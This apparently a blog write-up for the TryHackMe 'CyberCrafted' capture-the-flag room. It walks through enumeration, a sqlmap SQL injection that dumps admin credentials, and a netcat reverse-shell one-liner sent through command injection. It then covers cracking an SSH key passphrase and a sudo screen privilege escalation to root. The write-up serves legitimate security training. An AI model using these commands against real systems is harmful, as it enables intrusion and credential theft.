Pwn this pay-to-win Minecraft server!
CyberCrafted is a CTF from TryHackMe, Medium level, it requires a fairly extensive enumeration. It remains accessible even for beginners. The escalation of privilege is pretty cool.
nmap -T5 10.10.235.114
3 ports are openSSH, HTTP, and port 25565which hosts the Minecraft game.
dirsearch -u 10.10.181.45
Dirsearch gives us the domain name of the website : http://cybercrafted.thm/
echo ‘10.10.181.45 cybercrafted.thm’ >> /etc/hosts
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H “Host: FUZZ.cybercrafted.thm/” -u http://cybercrafted.thm/ -fs 0
There are three subdomains that need to be enumerated with dirsearch. First, they must be added to the host file.
dirsearch -u http://admin.cybercrafted.thm/
The site http: //admin.cybercrafted.thm/login.php, asks for identifiers that we do not have. In addition, access does not appear to be vulnerable. (no bypass authentication)
dirsearch -u http://store.cybercrafted.thm/
On the site http: //store.cybercrafted.thm/search.php, we have the possibility to perform a search. This page is vulnerable to sql injection (sqli).
To do this automatically, you must intercept the request for a search in BurpSuite. Once intercepted, it must be saved and used in sqlmap.
Initial command to test the vulnerability :
sqlmap -r req.req
Final command (dump credentials) :
sqlmap -r req.req –dbms=mysql -D webapp -T admin –dump
By copying the hash on the site https://crackstation.net/ , we get the password.
On the site we have the possibility to enter orders.
Since you can pass system commands, chances are you can get a reverse_shell.
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f
Once the reverse_shell has been received on nc, we are with the www-data account. In the /home folder is the account xXUltimateCreeperXx, in which a nice private key id_rsa is present.
ssh xXUltimateCreeperXx@127.0.0.1 -i id_rsa
The private key is encrypted by a passphrase. To decipher it, you have to use ssh2john. Before, we will copy it locally to kali.
scp id_rsa firstname.lastname@example.org:/root/trytohackme/cybercraft/
Command to crack the key :
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Once on the xXUltimateCreeperXx account and in view of the questions asked by tryhackme, you have to find the location of the Minecraft games.
It is in /opt (nothing too rocket science)
After listing the subfolders and files, the password for the cybercrafted account can be found in the following path /opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt
Command to switch to cybercrafted account :
First command to made :
The user has root rights to execute the command /usr/bin/screen -r cybercrafted
sudo /usr/bin/screen -r cybercrafted
And we get this window :
To switch to the root account, you have to make these keyboard shortcuts.
crtl a then do ctrl c
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
Hope he got you more and taught you new things.
Please feel free to leave a comment or share this article.